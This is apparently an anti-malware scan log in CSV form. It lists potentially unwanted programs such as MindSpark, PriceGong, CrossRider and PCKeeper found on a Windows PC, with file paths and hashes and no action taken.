PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\lmma.png, No Action By User, 764, 178464, , , , , 1483A1804C7C955ABEB4C15C93F4C8AE, 3FB9925AEB6B1FDB859104E6AA3EFDAB1EF681E4A141ACDDF832191CC301D0FB
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\lmosh.png, No Action By User, 764, 178464, , , , , F4B22C062F472A34B8915EFBA4D1E10D, 7AFFEF2E99770379F515E789144B6C9667A9C43D5AD912B75AC1214FF5534C3F
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\lmwf.png, No Action By User, 764, 178464, , , , , 0757141C8F5A8C149F759AC89A5F401D, 285F2586EA31735F6E2C34E6BAA28DCBDFDC477D6A006AB35BB92CE6019A018A
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\lmws.png, No Action By User, 764, 178464, , , , , 1FEED75F27039D092C8CB376CE5B29D4, 48E80F73BFAD1BCED846B44B3EF8210D8836C03793175E8E262E4A3ACC6994E7
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\lobm.png, No Action By User, 764, 178464, , , , , 9848BCA168BC5C61A4798FA7F9F0E2B6, 697453B8FA13E7F5232049D2C7868C0DD91D24F933D012A2DFC65E953EBC329D
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\loryte.png, No Action By User, 764, 178464, , , , , D9DB2D86DB1D102388D96EFCEFDDA444, 695E8C84B8181D01211D77B012EF37FD95B5C088751FD5F12DB858AEE0A4194F
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\lpss.png, No Action By User, 764, 178464, , , , , D7F42A065766DFEDFE8946799F38343D, 8BB7FE6074703FF018700274C53AE20E8DF1CA9F7A11405BE26D29B52AAE0F10
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\lqc.png, No Action By User, 764, 178464, , , , , FC94F301F90019A121E4594979641D50, AAD7508F96EA5642079A0ABBE034CE8000432E64EB0AC04AED11481FBDA73306
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\lrb.png, No Action By User, 764, 178464, , , , , D8F7E1E5E3E42E2A0E09C964F5CCC036, FBFB1214C5CAC49CD410C5F0B0D988ECD9CF1A0B2D4CEB5A6862C177AE6A8AEF
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\lrg.png, No Action By User, 764, 178464, , , , , FF4D0960B2E474A8C603DDF7BAC8C2C3, 8945FD825681BAB00FDDB368F1146CF67FC873B0821B4D836EB296B3AFAD528C
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\lrr.png, No Action By User, 764, 178464, , , , , 3FA59D5147ECF5AEA75F8A7709E8725A, 56A10A06DC290848829157B5700F1E465E7E324CCB0E05763C65DD51B14FA685
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\lsc.png, No Action By User, 764, 178464, , , , , D0F8720922C9721C7C6A68C8EB7DD90E, 110E4E2A824C3A7450FC8751BE4D675C1A5CDB0EFA9FE1F4F36B443CD5A9CE8E
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\lscr.png, No Action By User, 764, 178464, , , , , 809883DE7B5752AF35A6537ED4583E1B, B5E09098C49710F19EF19EACE8167357BEFD2EDDE258C5123886DF7F9C5E2D3D
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\lsi.png, No Action By User, 764, 178464, , , , , 9BB7C8151DCA37B1C35B74C759513355, 81DF493A31530CA608AF867F0C0740D3A5A61DF6B96493078463339A20FB43CC
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\lssd.png, No Action By User, 764, 178464, , , , , CED5D39CD287940F18A5E2B55282981E, 5CAA9B3A8CB170ED6BF05F0B0B1A0E22DE5BB277F173A48DCE9699D8241F55E0
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\ltrs.png, No Action By User, 764, 178464, , , , , A7B28EBE08CF25BBCBEF7B59E76E0FE1, BDFF259E9A6DA7757458D05F1112533D585C62ED7051CB84E2369AD9ECEDAE3A
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\ltvf.png, No Action By User, 764, 178464, , , , , AF2404CC394EA5FFDFC888EC63B9D0E3, 2B0EDBBDEB14AAC45DDC932FC556048FD7CB81E351770E23F6826DC366C58E0B
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\lvs.png, No Action By User, 764, 178464, , , , , 945E3C71247B6B0947BDA4BF3ED682C9, 23688370EA18A5A9039CD9014EBF092C4D6EDD5792B597DE6B4EA372BE9E5A31
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\lwb.png, No Action By User, 764, 178464, , , , , C8EE0D1FB9B7B88DFE7799F2E9AF8C9E, 90E4FF80249B6B5A6B4240BD42973C85A6D0200960B471C96CE67606F8FD93D1
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\lwf.png, No Action By User, 764, 178464, , , , , D671A529B0D961489E613CDA9B8C2686, F05D1E65E8E59BA8154A75F4BD5E7C1F6116213CFB863134EB98643F4CB2284D
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\lzwinky.png, No Action By User, 764, 178464, , , , , 9808DC1BCEB86739239B82373AFB9E1D, 746D05FB5AAE0EAD6131BE4F0905AF2375450EA4C4BDAF331CE272343BAAF393
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\mgaddons.js, No Action By User, 764, 178464, , , , , 63C078CAE42A5FE80F11EFD2EB3AAACD, 1B9A51F4CF86851AF84530854F1D610AA22CE695EDD44D254EB6346E1731E2DE
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\ok.png, No Action By User, 764, 178464, , , , , 47C6763104F7A02414E649AFF5D65711, 945FE6C4F0EB3EE05FC886ACA5DB71876CCB73D5A6D1FBDF871B8BEDBEB96A03
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\overlay.js, No Action By User, 764, 178464, , , , , 5EBE43E0D867DEDC7552CDE5A54F2C7A, 2E70B6E67A6FC40389AB371F6EE8CFAC1C3D1DCDF8D6307A2E6489AC43B4B30F
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\pid.js, No Action By User, 764, 178464, , , , , E5BA3F582422B2E1A74889AAFA7DF656, C71ABEB66B77C130A87580ED74AF0EF549FFF6F6FD9B738CD16860DA392FF604
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\qstring.js, No Action By User, 764, 178464, , , , , 851AE8A50B1A34CCC2816F3E9DD022B1, 74CD52AC4AC6F444D5AB7E48DC985DE44C869D5E654B976A1546F8D11C7E6E18
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\shield.png, No Action By User, 764, 178464, , , , , D87ECB697395EB9BD3553B74134A6A76, 01A818764FFF994D5C488848A274F175B915EAF44AC1FF3FF4A6FF21360FA5C2
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\spacer.swf, No Action By User, 764, 178464, , , , , 9D45B89D2DA3EFBAD74A27099EA567C3, 1FD2DACB672BE781224018D215DF81B42C1894E8FE7DD853D70CD481E5C38CC2
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\toolbar.js, No Action By User, 764, 178464, , , , , 4301D962618D1B5B0529F44A93E0792C, 1A94F545067E9790BB00A47F1543256824D4DFCDEB39BCAC1C46B788B75760FB
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\yelgrey.png, No Action By User, 764, 178464, , , , , 8851A5BDB4C5CD4A6D1556A4F0A953EE, 9E81BD95DC325CE4D9E1D64DDDCB2E73A2CA38B57555037A285769CBEDCBACA1
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\yellowbg.png, No Action By User, 764, 178464, , , , , 8851A5BDB4C5CD4A6D1556A4F0A953EE, 9E81BD95DC325CE4D9E1D64DDDCB2E73A2CA38B57555037A285769CBEDCBACA1
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\zEnable.css, No Action By User, 764, 178464, , , , , 69632922A89F92764C09221C6F703C8D, 4D54F6C6133CAEC21B3229577C399C3A5C9D31330AC9B77C8DB986D8182C8E61
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\zEnable.htm, No Action By User, 764, 178464, , , , , 6DD15A4EDD98E78E1F2900C45DC7F4B2, 36CA2827FA9464F92EDC170242D6556F606CC5213D97CC9926D2C3634717073A
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON\zEnable.js, No Action By User, 764, 178464, , , , , 20AAD0C5C7925F90EC516D454ED2EAE2, 0FF974899324A632C4C6D7E086B0F713F583C89C844DB531E8E36204F728906D
PUP.Optional.MySearchDial, C:\Users\Marilyn\AppData\Roaming\mysearchdial\UpdateProc\config.dat, No Action By User, 108, 178629, , , , , 5A3BC6DCC5B015E2BEACD702E6BB5D65, C194FCE7090FB366B3D163F2C97FE7A6FA91D4ECA2607DC229FAA7E2DCD24DF3
PUP.Optional.MySearchDial, C:\Users\Marilyn\AppData\Roaming\mysearchdial\UpdateProc\info.dat, No Action By User, 108, 178629, , , , , D5191AE965ABB226175082A7A54B028A, BF7909EA6E7BC0A596AFA9AF2C97BC397248FE21BCD729BC744F8CE47D95192D
PUP.Optional.MySearchDial, C:\Users\Marilyn\AppData\Roaming\mysearchdial\UpdateProc\STTL.DAT, No Action By User, 108, 178629, , , , , BD519E88D79BABB05B18686C33C82715, 7750547DF934E2EE18AD851AA4DA135DB15402FFD8CBDC3422FDB905A5E70CF4
PUP.Optional.MySearchDial, C:\Users\Marilyn\AppData\Roaming\mysearchdial\UpdateProc\TTL.DAT, No Action By User, 108, 178629, , , , , BECC353586042B6DBCC42C1B794C37B6, 7A0B3A11BB6A66991D5176675C615449298642413801C24CD764F1673F8DBE98
PUP.Optional.ASK, C:\USERS\GUEST\APPDATA\LOCALLOW\MICROSOFT\INTERNET EXPLORER\SERVICES\SEARCH_ASK.COM.XML, No Action By User, 268, 339227, 1.0.49973, , ame, , E866A0FB466B5F4DFB82F73A751FBAB0, 1E378A1D87313634AF861FDFC60637C4CB951C6D3E2FAE6E14E1CF4BA857D07E
PUP.Optional.PriceGong, C:\Users\Marilyn\AppData\LocalLow\PriceGong\Data\1.txt, No Action By User, 1535, 179000, , , , , 04F90D5C1805DCD539BA508880755437, 5CD3EDC29808822B229BDF4320E14DD617CE94416401F05E921BA6D3642929A5
PUP.Optional.PriceGong, C:\Users\Marilyn\AppData\LocalLow\PriceGong\Data\4489.txt, No Action By User, 1535, 179000, , , , , 1FDC876D2409D494D9FB3471FE91F0FD, D68A8C8A6B7D9386E22B3907DF0C971521D34149910046B53A7774B71A30AC8B
PUP.Optional.PriceGong, C:\Users\Marilyn\AppData\LocalLow\PriceGong\Data\a.txt, No Action By User, 1535, 179000, , , , , 1C3C7788E547BFC4C5A1453DCC322FC8, 93C6043404915CB562B54CE2E0747234F8362592FF2EDB85DE8D563E2855325D
PUP.Optional.PriceGong, C:\Users\Marilyn\AppData\LocalLow\PriceGong\Data\b.txt, No Action By User, 1535, 179000, , , , , 31F826784CDB324F08CC8E42CF482803, 5F833096F2AA6026C434830DB5874B1D27713725C59E941D3180B6D2D11CC89D
PUP.Optional.PriceGong, C:\Users\Marilyn\AppData\LocalLow\PriceGong\Data\c.txt, No Action By User, 1535, 179000, , , , , E9F9B0512A242EF661296B5026AAD334, 2AF78484F3EE7361208D64038583C98B0D6CD0A7B4093D1030B74591DEF162AB
PUP.Optional.PriceGong, C:\Users\Marilyn\AppData\LocalLow\PriceGong\Data\d.txt, No Action By User, 1535, 179000, , , , , D9C1970AFB74275FDC1A48C77747DA23, 4DD3FFD5438A17B6B5F3708A6F0D89F141B3233E388ACBFC994CAA0FFF253C23
PUP.Optional.PriceGong, C:\Users\Marilyn\AppData\LocalLow\PriceGong\Data\e.txt, No Action By User, 1535, 179000, , , , , 4478A7197E9D03518EDAEF3DE6A53F1E, 7C28972346A5FB883E00AB1685B7A0C4A1AD3059EB3136B912D0222FFC38293B
PUP.Optional.PriceGong, C:\Users\Marilyn\AppData\LocalLow\PriceGong\Data\f.txt, No Action By User, 1535, 179000, , , , , AE61E6FD2B83A31A579343834F0B2261, B79A953C58EAD76F44F39A3E4A30A1ECF365E3FF3B5356C98D8C130B4FE7B9A1
PUP.Optional.PriceGong, C:\Users\Marilyn\AppData\LocalLow\PriceGong\Data\g.txt, No Action By User, 1535, 179000, , , , , F132E1327D955DDCF2410DDBCE27977B, 9A9CEC3B5FDC294032FCDD17DDBE5DF5CED62D84F5BBAB7B3D6F88A72563AF01
PUP.Optional.PriceGong, C:\Users\Marilyn\AppData\LocalLow\PriceGong\Data\h.txt, No Action By User, 1535, 179000, , , , , 1C933F0B4FA6D9234664C4B35D0FA056, D984F55480DA77CBA3339E6C3FBC6B52333E1F7EE714FA571589339B3EBFD2B7
PUP.Optional.PriceGong, C:\Users\Marilyn\AppData\LocalLow\PriceGong\Data\i.txt, No Action By User, 1535, 179000, , , , , DFB5E9CF477EEFEB4217DC2264194EA0, D1089769232B14F4B02B6212E43399CC2C9BCB6AFAFC475D6CC73CE8831766EA
PUP.Optional.PriceGong, C:\Users\Marilyn\AppData\LocalLow\PriceGong\Data\j.txt, No Action By User, 1535, 179000, , , , , 78D2D5154EDCBE53E63BCABB65E5F263, 8B1C3B363843A9D71BC1171DB8E7B55AA79B9B12FA55E7871B02758B67B6CDA3
PUP.Optional.PriceGong, C:\Users\Marilyn\AppData\LocalLow\PriceGong\Data\k.txt, No Action By User, 1535, 179000, , , , , F0B59EF60BB38DD2D02912CB7713D8C1, 833B1B168FC39018F9132561F90297DEAE10E4F32F099EFB3979D198203C982B
PUP.Optional.PriceGong, C:\Users\Marilyn\AppData\LocalLow\PriceGong\Data\l.txt, No Action By User, 1535, 179000, , , , , 6319BF7E355E7788EA821DA71708C299, DEFBF1973CFBF99A9E5323A01C52512B03F18EE33AA1D53C7FF3C9A56AFEEFC6
PUP.Optional.PriceGong, C:\Users\Marilyn\AppData\LocalLow\PriceGong\Data\m.txt, No Action By User, 1535, 179000, , , , , 020508C82FE596309ED276EF823CB61B, 1F75439C1162802170CD01D45906C49219F8BEF36207482C11D02F05196029C8
PUP.Optional.PriceGong, C:\Users\Marilyn\AppData\LocalLow\PriceGong\Data\mru.xml, No Action By User, 1535, 179000, , , , , 9F1537353F5259DF524BC7B0EF7D85D2, 78B897059B7F16AABC8F3B683B69DE58A7CE06F210F70AE116C542D1381908F0
PUP.Optional.PriceGong, C:\Users\Marilyn\AppData\LocalLow\PriceGong\Data\n.txt, No Action By User, 1535, 179000, , , , , CD3923E00F6DCC9EB1CA8964592324EE, 6A8674DA36B3284E7273062E50466A5CF13900C95CAECC0A24FD975102E1E316
PUP.Optional.PriceGong, C:\Users\Marilyn\AppData\LocalLow\PriceGong\Data\o.txt, No Action By User, 1535, 179000, , , , , AF9B49F9E4200DD509F89DD6D553F5B1, 943EE9D609F045D0773CD2840DF390A70F952E865CC082E809A3622A33206D34
PUP.Optional.PriceGong, C:\Users\Marilyn\AppData\LocalLow\PriceGong\Data\p.txt, No Action By User, 1535, 179000, , , , , 7DBB7495E848EC9EDA192FDB394DB289, 35D6EADA54AC15FA449245F631F0FED1B0E41175B4E1CDE9253DAD0900640C5C
PUP.Optional.PriceGong, C:\Users\Marilyn\AppData\LocalLow\PriceGong\Data\q.txt, No Action By User, 1535, 179000, , , , , AC67B92037C274FEEF17DA33F8ECFC4E, A911E8A00C5042A51CE0C960EDDF8B89A945D897893DB24E7F15F77492244EA5
PUP.Optional.PriceGong, C:\Users\Marilyn\AppData\LocalLow\PriceGong\Data\r.txt, No Action By User, 1535, 179000, , , , , 5BBCA2DF490FCA7CB363FFA22228AF67, C45E9C69A2671412CF68C9C02446365CF607FEBA9CFA98CDFAD799430494DB41
PUP.Optional.PriceGong, C:\Users\Marilyn\AppData\LocalLow\PriceGong\Data\s.txt, No Action By User, 1535, 179000, , , , , ACA841C2208B6F264B489890D8AE33A2, CFFCAC619190D54304E31D0A68878FA4C11BA6C09428E1905C7F5E0FBA1ED135
PUP.Optional.PriceGong, C:\Users\Marilyn\AppData\LocalLow\PriceGong\Data\t.txt, No Action By User, 1535, 179000, , , , , 07D9CF0CBEF8B22E4B9F8D3D738259DD, 40AAC717B1F663387452DB891CA53BB69B26B3BDB705A4E25E22FD548DFA380B
PUP.Optional.PriceGong, C:\Users\Marilyn\AppData\LocalLow\PriceGong\Data\u.txt, No Action By User, 1535, 179000, , , , , 12295EA10FAA0CD7D0BD1E43A2D27F12, DF97453A0310DD414C009375E6C55890949A4BF2F050089069774A718ED4C8AC
PUP.Optional.PriceGong, C:\Users\Marilyn\AppData\LocalLow\PriceGong\Data\v.txt, No Action By User, 1535, 179000, , , , , 461EE73FA6B256A9A60B2F1B2354A36B, F9EB4F33F45CCB2A010B112FC9A550F5B897403E3378CBD83E273A86851A2825
PUP.Optional.PriceGong, C:\Users\Marilyn\AppData\LocalLow\PriceGong\Data\w.txt, No Action By User, 1535, 179000, , , , , 696FB6E4515A98E08CF0F62364F68D04, 1237DDE6BA31272A535AD167A6B421E141CE2B997BFCD242348473F5AB28217E
PUP.Optional.PriceGong, C:\Users\Marilyn\AppData\LocalLow\PriceGong\Data\wlu.txt, No Action By User, 1535, 179000, , , , , 329DA84A8DD7E4337BE0A897CA431E55, 914920B518700CE33191FBD475AB6114BCBC23B7D50406F4C8987413B5D42466
PUP.Optional.PriceGong, C:\Users\Marilyn\AppData\LocalLow\PriceGong\Data\x.txt, No Action By User, 1535, 179000, , , , , 244421EEAABD14F52EFF7C179E5F6219, 86BA5593FA2511CA50EE28D69CA1DA6A518DBB6A12DAC1B2F8C529B842767B44
PUP.Optional.PriceGong, C:\Users\Marilyn\AppData\LocalLow\PriceGong\Data\y.txt, No Action By User, 1535, 179000, , , , , FE195F06B5AE8A0DBAB1D0BD7DE038AC, 98A594AEB8C6628D714C82A8E752E22325969CF76BA17FC9266F15E5DF03E98A
PUP.Optional.PriceGong, C:\Users\Marilyn\AppData\LocalLow\PriceGong\Data\z.txt, No Action By User, 1535, 179000, , , , , 3093162BE28B5B84031FC32C434E20FE, 3C326E84FE4A85A1CB1DE12121CE58D33E0C0B9F5853D5B9B061851C4BCEBD19
PUP.Optional.ASK, C:\USERS\MARILYN\APPDATA\LOCALLOW\MICROSOFT\INTERNET EXPLORER\SERVICES\SEARCH_ASK.COM.XML, No Action By User, 268, 339227, 1.0.49973, , ame, , E866A0FB466B5F4DFB82F73A751FBAB0, 1E378A1D87313634AF861FDFC60637C4CB951C6D3E2FAE6E14E1CF4BA857D07E
PUP.Optional.CrossRider.Generic, C:\WINDOWS\SYSTEM32\TASKS\Information-codedownloader, No Action By User, 1950, 259448, 1.0.49973, , ame, , 8D1817DBC2A17F345BF0A23386538E10, 7B7DCD1C24CBB5F8F6D438A91A1DCFAD9E4BC800032E78563331E1B59FA06566
PUP.Optional.CrossRider.Generic, C:\WINDOWS\SYSTEM32\TASKS\Information-firefoxinstaller, No Action By User, 1950, 259449, 1.0.49973, , ame, , 52D3E94771405DBE5BD325947FBF9044, 132C124AF8DBA0F785C187F11E8D0848791F48C11458F7CB23DE96DA874FA303
PUP.Optional.CrossRider.Generic, C:\WINDOWS\SYSTEM32\TASKS\Information-enabler, No Action By User, 1950, 260095, 1.0.49973, , ame, , F2E2C69E3ECB57EE7E07956092A4B1F9, 39C6A547E0ED300A082829403FB39B70320F0D1F44086342A3BEDF7CF23E9D26
PUP.Optional.CrossRider.Generic, C:\WINDOWS\TASKS\Information-enabler.job, No Action By User, 1950, 260097, 1.0.49973, , ame, , 1818991DBAE86CD623EBDE6E01C6A60E, 7BED4EE60A5AFDCB84468B21F830C54BC1A8BF1D7116EA26998789A0B6067ADC
PUP.Optional.SlimCleanerPlus, C:\WINDOWS\TASKS\SlimCleaner Plus (Scheduled Scan - Marilyn).job, No Action By User, 1633, 334098, , , , , 1B9A549B2D12F6AF714EF7AD411F60F0, 45C388712A122B0190C569DA3A427C2091908CF8EDB50F0E96C768044453AC48
PUP.Optional.SlimCleanerPlus, C:\WINDOWS\SYSTEM32\TASKS\SlimCleaner Plus (Scheduled Scan - Marilyn), No Action By User, 1633, 334098, 1.0.49973, , ame, , B2B49A8926CCD68A8776C4E0AB4F3ED8, D51D738F41C66540648FC7BF40F6E74C4A1C047BF6CD4FD92A0EFFA4B15DEA9F
PUP.Optional.ASK, C:\USERS\LINDAG\APPDATA\LOCALLOW\MICROSOFT\INTERNET EXPLORER\SERVICES\SEARCH_ASK.COM.XML, No Action By User, 268, 339227, 1.0.49973, , ame, , E866A0FB466B5F4DFB82F73A751FBAB0, 1E378A1D87313634AF861FDFC60637C4CB951C6D3E2FAE6E14E1CF4BA857D07E
PUP.Optional.ASK, C:\USERS\JAY\APPDATA\LOCALLOW\MICROSOFT\INTERNET EXPLORER\SERVICES\SEARCH_ASK.COM.XML, No Action By User, 268, 339227, 1.0.49973, , ame, , E866A0FB466B5F4DFB82F73A751FBAB0, 1E378A1D87313634AF861FDFC60637C4CB951C6D3E2FAE6E14E1CF4BA857D07E
PUP.Optional.PCKeeper, C:\PROGRAMDATA\ESSENTWARE\INSTALLER\PCKeeper_setup.exe0.llog, No Action By User, 1335, 437658, 1.0.49973, , ame, , 2CFA345CA58BF38909235E7AD61C5F4A, FFD9C7518F1C7860513A0B093C98AAA6E55D7A3A6902588C1D3A4D750D223B5C
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\AccountService\AccountService.exe0.llog, No Action By User, 1335, 437658, , , , , 6EC0B5B74F43390F829F3E1EE6DBB164, F0BFDEF9F69F379923E89F863EE38B52305F1154E45739FDE38918AE3C6587F0
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\AccountService\AccountService.exe1.llog, No Action By User, 1335, 437658, , , , , 4FF3C7CBACBDDF25B08FF80DD885EE6F, 0EF4E53D443B1AC9361C58653B16B0CFEFE3C0A3A937A60E30C69E293725606D
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\AccountService\AccountService.exe2.llog, No Action By User, 1335, 437658, , , , , 7C53B7E0B963BD4DA4DEE8D4ACCF62BA, 8C992F07BF0EC67F75865A4299E28D7B663163E6753A2A6CBBA4A781DCB4CCA8
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\AccountService\AccountService.exe3.llog, No Action By User, 1335, 437658, , , , , AD7CCDC647901FD5006A717C0CCC5024, E6B4486FBCEAB04A9C7F7E98874E0721BD8DE25E41D6CD49A2BFF228D3D76BCC
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\AccountService\AccountService.exe4.llog, No Action By User, 1335, 437658, , , , , B0594D024C65A67FD6619CB8EBE33221, 63200D5A6D154A79B82364E2B16AE830A8B06A8201B229CDD64C6ED7AACF2BDB
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\AccountService\AccountService.llog, No Action By User, 1335, 437658, , , , , 12F2490F5ED683F4A673075A5051D944, 137853D96EE15CA34161644EE5F9D78C46624FD5F6C01FA02A7D1C4AD210EC7C
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\AccountService\CrashReportSender.llog, No Action By User, 1335, 437658, , , , , 6912CF69D21CF04ED36BB9D793679B64, 2649C657543192BE0A549628D2C2DDC9333DA161CFBD8ABF4BB5929BB83E5744
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\Installer\AccSvc.log, No Action By User, 1335, 437658, , , , , 9D08D3C05E247C9EB86AFAF6482E7A9B, 174A25B921254E168A6C3CCD7CBEF67B97EBDA9DBB7669C537B0F51B1F0F3DC8
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\Installer\installer.exe0.llog, No Action By User, 1335, 437658, , , , , 58A19E2A238032F2DD0853731A4880A5, 0113A4A43298A0DCF52C4A574F4D50387C6FB3EAF4EC8FA47673C984B961CA5B
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\Installer\installer.exe1.llog, No Action By User, 1335, 437658, , , , , 40F8B2229F5AF70A94086D09238A488D, B006319F7FCA1D7652B0FB98C704D6C83E68D815F9731A631295D97C9FD88B09
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\Installer\installer.exe2.llog, No Action By User, 1335, 437658, , , , , 7D19FFC89CDCB1722F2167471A21F5CE, E277983458E07F3D6DD5FB0E81C1768116D5EF7A28DC86A91CA96C4D0901B3E2
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\Installer\installer.exe3.llog, No Action By User, 1335, 437658, , , , , 319A7D457D44C327740588266E1E8635, 3DECCA6237D96924BF30CA2929C0740140B32CA43513FD7A1CA4C150BF42EAFE
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\Installer\installer.exe4.llog, No Action By User, 1335, 437658, , , , , 8A2AF8BAA3F8ACB674D04050ACCF122A, 76A4D71D3D3A96611F6D97AE68BF3F4F28CAF0541843E0C51AB0941AB0FBA4CF
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\Installer\installer0.exe0.llog, No Action By User, 1335, 437658, , , , , 995585D077A2CAA51B77BB2A89C1E37C, 25FE33B2F59DDAD6CEAE8C886AAB7F95CF85808A2C546347A5261888C5D5B285
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\Installer\installer0.exe1.llog, No Action By User, 1335, 437658, , , , , 4F80DC1BE32AB049C2D391F3E12D995E, 802811B54073C8B90BA3A2B5B08DD1A98D075E4482C2922BA1B2F124B515D72D
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\Installer\installer0.exe2.llog, No Action By User, 1335, 437658, , , , , BA1FC5646F3BF1A363EC3D8499071A8A, 646C0A042A35E8852C6CC0323F0D5569A1A937A0D236E48AFB99BD0297D95CDF
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\Installer\installer0.exe3.llog, No Action By User, 1335, 437658, , , , , AC5F847830EF298984E50E39FE675274, CE2728C54BAE546364DA9DABE50521EEDDB41DB6211ACDE2F801C7D7315D7DCC
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\Installer\installer0.exe4.llog, No Action By User, 1335, 437658, , , , , 703102BCB869013D1005CCF11E8B3E3E, 07DA7FD12594068EF1D7B7EA31FC6C915E9457D439D12CF6E722EC5DE515F2C3
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\01_12_2016\19_00\HKEY_LOCAL_MACHINE_SOFTWARE_Classes_CLSID_{58FC39EB-9DBD-4EA7-B7B4-9404CC6ACFAB}_TypeLib.reg, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\01_12_2016\19_00\HKEY_LOCAL_MACHINE_SOFTWARE_Classes_CLSID_{5E688170-BDC7-48AA-A339-5F74CFDBDC9C}.reg, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\01_12_2016\19_00\HKEY_LOCAL_MACHINE_SOFTWARE_Classes_CLSID_{61095308-52CE-433B-9A66-57B9E5835B60}.reg, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\01_12_2016\19_00\HKEY_LOCAL_MACHINE_SOFTWARE_Classes_CLSID_{62B032B7-F027-4274-BFB1-A0418EB9D0D9}.reg, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\01_12_2016\19_00\HKEY_LOCAL_MACHINE_SOFTWARE_Classes_CLSID_{649CCF8F-C1C9-4275-88B7-31CA8B31154C}.reg, No Action By User, 1335, 437658, , , , , , 
